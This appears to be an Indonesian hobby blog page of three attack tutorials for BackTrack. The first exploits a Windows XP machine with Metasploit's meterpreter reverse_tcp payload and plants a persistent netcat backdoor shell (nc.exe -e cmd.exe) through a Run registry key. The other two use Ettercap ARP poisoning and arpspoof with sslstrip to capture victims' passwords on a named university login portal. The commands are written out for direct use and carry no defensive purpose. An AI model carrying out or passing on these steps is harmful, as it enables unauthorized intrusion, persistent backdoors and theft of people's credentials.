SELAMAT DATANG DI BLOGGER ZZZZzzzz

Senin, 11 Mei 2015

SCRIP EXPLOIT NC.EXE


Berikut saya akan memeberikan tutorial mengenai BACKDOOR pada BackTrack.


1. Buka terminal pada backtrack dng cara tekan ctrl+alt+t kemudian enter.
kemudian ketikan perintah ifconfig

catat atau ingat IP address nya.

2. lihat IP address target yang menggunakan Windows xp, catat atau ingat IP address nya.

3. Ketikan Perintah  cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
4. ketikan nmap -sS -0 192.168.77.39 pada terminal backtrack, Ip yang kita masukkan adalah IP pada Windows / Target, Jika berhasil akan muncul seperti berikut :


5. buka terminal baru kemudian ketikan msfconsole, setelah itu muncul seperti berikut :

6. Ketikan set payload windows/meterpreter/reverse_tcp
7. set lhost 192.168.77.12 ( IP pada backtrack)
8. set rhost 192.168.77.8 ( IP Target)
9. ketikan exploit, maka akan tampil seperti berikut :


10.  upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

11. enumkey -k HKLM\software\Microsoft\\Windows\\CurrentVersion\\RUN

12. reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe" 



13. Sekarang kita eksekusi komputer targetdengan merestart komputer nya, ketikan reboot, jika berhasil maka hasilnya seperti ini.



Berikut link jika ingin lebih jelas.
https://www.youtube.com/watch?v=30ysqaH-P_c







Diposting oleh di Tidak ada komentar:

Jumat, 17 April 2015

Tutorial ARP Poisoning Ettercap

baiklah saya akan memberikan tutorial ARP poisoning ettercap pada backtrack..

langsung saja kita lihat tutorialnya seperti ini..
pertama siapkan backtracknya dan buka terminal.
langkah pertama perhatikan gambar berikut...


masuk ke terminal backtrack dan ketikan gedit /etc/etter.conf kemudian enter.




kedua, akan tampil gambar seperti d bawah ini, kemudian hilangkan tanda # pad tulisan redirect.


ketiga, berikut gambar yang tanda # telah di hapus.
setelah tanda # di hapus, simpan file dengan cara tekan ctrl+x, kemudian y lalu enter.


ke empat, ketikan ifconfig.
ingat/ di catat ip nya 


ke lima, ketikan ettercap -T -q -i wlan0 -M ARP // //

maka akan tampil seperti ini.


setelah itu tunggu sampai target untuk login, setelah si target login maka seperti inilah gambar nya.

itu adalah username dan password si target saat login sisfo.binadarma.ac.id




 selanjut kita coba cara yang dengan cara buka terminal  baru cara cepat ctrl+alt+t sudah terbuka ketik ettercap -G 
selanjutnya arahkan cursor anda ke unifeed snaffing selanjut akan tampil ettercap input lalu kita ubah menjadi wlan0 ok
selanjutnya arahkan cursor anda ke Host pilih tools host list lalu pilih lagi tools scan for hosts akan tampil ip seperti gambar dibawah ini 


langkah selanjutnya arahkan kursor anda ke mitm pilih tools Arp poisoning lalu akan tampil seperti gambar ada dua pilihan lihat gambar aja atau cetang only poison one-way


selanjutnya kita arahkan cursor ke tepi kiri pilih tools start lalu pilih tools start snaffing atau perintah lain ctrl+w tunggu si target  login dan hasil akan tampil password korban lihat gamabr dibawah.


SELESAI.

berikut link video nya : https://youtu.be/rwrAH0AIzU4
Diposting oleh di Tidak ada komentar:

Kamis, 16 April 2015

Tutorial ARP Spoof ssltrip

saya akan memberikan tutorial ARP spoof sslstrip pada backtrack...


langsung saja kita lihat tutorialnya seperti ini..
pertama siapkan backtracknya dan buka terminal.
langkah pertama perhatikan gambar berikut...

ketikan ifconfig pada terminal kemudian ingat ip nya atau di catat.


langkah ke dua, ketikan echo "1" > /proc/sys/net/ipv4/ip_forward.


ketiga ketikan  iptables -t nat -A PREROUTING -p tcp --destination-port 80-j REDIRECT --to-port 8080 


ke empat ketikan arpspoof -i wlan0 -t (masukan ip yg di ingat/catat dan gateway nya), contoh : 192.168.43.255 192.168.43.1


ke lima buka terminal baru dengan cara tekan ctrl+alt+t, kemudian ketik netdiscover -i wlan0 -r (masukan gateway yg tadi) 192.168.43.1/24



 ke enam akan terlihat ip yang satu jaringan dengan anda.



ke tujuh, setelah ip target terlihat tekan ctrl+c, kemudian ketikan sslstrip -w hacking -l 8080, kemudian enter
catatan : (hacking diatas boleh di ganti,terserah anda mau dengan nama apa, dengan nama anda juga boleh) dan -l (itu l kecil bukan angka 1).


ke delapan, buka terminal baru dengan cara tekan ctrl+alt+c, kemudian ketikan nama file yang td, seperti ini : cat hacking, kemudian enter.


ke sembilan, di sini akan terlihat akun sisfo si target saat login menu sisfo.binadarma.ac.id.


SELESAI..

itulah tutorial ARP spoof sslstrip dari saya, semoga bermanfaat..

berikut link video tutorial nya : https://youtu.be/HILEvdh1AiU
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)